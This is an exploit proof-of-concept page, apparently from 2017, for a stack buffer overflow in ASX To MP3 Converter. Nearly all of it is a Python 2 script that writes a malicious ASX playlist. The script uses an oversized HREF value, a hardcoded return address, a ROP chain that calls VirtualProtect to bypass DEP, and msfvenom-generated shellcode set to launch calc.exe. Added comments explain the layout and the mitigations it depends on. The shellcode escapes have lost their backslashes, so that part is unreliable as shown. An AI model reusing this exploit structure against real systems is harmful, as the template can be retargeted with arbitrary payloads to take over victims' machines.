
ASX To MP3 Converter Stack Overflow

Posted on 11 October 2017

# Proof-of-concept generator for the stack overflow described on this page.
# It writes a single file, exploit.asx, whose <REF HREF> value is an
# oversized string.  The code is reproduced token-for-token from the page
# (Python 2 syntax: print statements, str-returning struct.pack joins); only
# the line breaks lost in extraction have been restored.  The quoted string
# literals below are kept exactly as extracted.
import struct,sys
# ASX playlist opening, cut off inside the HREF attribute so the remaining
# payload lands in that attribute value.
head ='''<ASX version="3.0"> <Entry> <REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
# Filler up to the control-transfer offset the author measured (17375 bytes,
# per the comment); everything after it follows directly in the file.
#offset 17375
junk = "A" *17375
# Two alternative return addresses are left commented out above the one
# used; all three are fixed addresses, so this only lines up with the exact
# module builds the author had loaded (no ASLR / rebasing).
#0x1003df8e
#0x774e1035
EIP="x36x10x4ex77"
# Four bytes of alignment between the overwritten return address and the
# ROP chain.
adjust="A" *4
def create_rop_chain():
    # Packs a fixed list of gadget addresses and constants into a
    # little-endian 32-bit byte string.  The per-entry comments (the
    # author's, from a gadget-finder tool) show the intent: load the
    # VirtualProtect pointer out of an IAT slot, stage its arguments in
    # registers, and use PUSHAD to turn those registers into the call frame.
    # This is a DEP bypass: DEP alone does not stop it.  Every address here
    # is absolute, so rebased/ASLR'd modules break the chain entirely; that
    # is the mitigation the chain depends on being absent.
    rop_gadgets = [
      0x73dd5dce, # POP EAX # RETN [MFC42.DLL]
      0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]
      0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
      0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL]
      0x7c96feb7, # POP EBP # RETN [ntdll.dll]
      0x7608fcec, # & push esp # ret [MSVCP60.dll]
      0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll]
      0xfffffdff, # Value to negate, will become 0x00000201
      0x77d74960, # NEG EAX # RETN [USER32.dll]
      0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll]
      0x01d64827, # POP EAX # RETN [msvos.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x77d74960, # NEG EAX # RETN [USER32.dll]
      0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll]
      0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll]
      0x77da1d04, # &Writable location [USER32.dll]
      0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll]
      0x76091182, # RETN (ROP NOP) [MSVCP60.dll]
      0x7d7da123, # POP EAX # RETN [WMVCore.DLL]
      0x90909090, # nop
      0x77195015, # PUSHAD # RETN [OLEAUT32.dll]
    ]
    # '<I' = little-endian unsigned 32-bit.  ''.join over struct.pack
    # results only works on Python 2, where struct.pack returns str.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
# The author's msfvenom invocation (windows/exec, calc.exe as the harmless
# demo command) is recorded in the comment; buf is its encoded output.
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "x00x0ax0d EXITFUNC=seh
#badcharacters "x00x0ax0d"
buf = ""
buf += "xdaxd6xbaxf5xa4x32xf4xd9x74x24xf4x5dx31"
buf += "xc9xb1x31x83xc5x04x31x55x14x03x55xe1x46"
buf += "xc7x08xe1x05x28xf1xf1x69xa0x14xc0xa9xd6"
buf += "x5dx72x1ax9cx30x7exd1xf0xa0xf5x97xdcxc7"
buf += "xbex12x3bxe9x3fx0ex7fx68xc3x4dxacx4axfa"
buf += "x9dxa1x8bx3bxc3x48xd9x94x8fxffxcex91xda"
buf += "xc3x65xe9xcbx43x99xb9xeax62x0cxb2xb4xa4"
buf += "xaex17xcdxecxa8x74xe8xa7x43x4ex86x39x82"
buf += "x9fx67x95xebx10x9axe7x2cx96x45x92x44xe5"
buf += "xf8xa5x92x94x26x23x01x3exacx93xedxbfx61"
buf += "x45x65xb3xcex01x21xd7xd1xc6x59xe3x5axe9"
buf += "x8dx62x18xcex09x2fxfax6fx0bx95xadx90x4b"
buf += "x76x11x35x07x9ax46x44x4axf0x99xdaxf0xb6"
buf += "x9axe4xfaxe6xf2xd5x71x69x84xe9x53xcex74"
buf += "x1bx6exdaxe1x82x1bxa7x6fx35xf6xebx89xb6"
buf += "xf3x93x6dxa6x71x96x2ax60x69xeax23x05x8d"
buf += "x59x43x0cxeex3cxd7xccxdfxdbx5fx76x20"
# Ten bytes of padding ahead of the encoded payload.
shellcode="S"*10+buf
print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)
# The author sizes the whole HREF value to a 26000-byte budget; this print
# shows the trailer length that budget implies.  The hardcoded 8303 below is
# what they actually used -- not checked here to match the printed value.
print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))
garbage= "C" *8303
# Closes the attribute and the ASX document so the file still parses as a
# playlist.  From a detection standpoint, an ASX whose single REF HREF runs
# to tens of kilobytes of repeated filler (per the budget above) is the
# observable artefact of this PoC.
foot ='''_playlis.wma"/> </Entry> </ASX>'''
# Final on-disk layout: header | filler | return address | align | ROP |
# padding + payload | trailer | ASX footer.
payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot
# Written in text mode without a context manager (Python 2 era script).
fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()

 
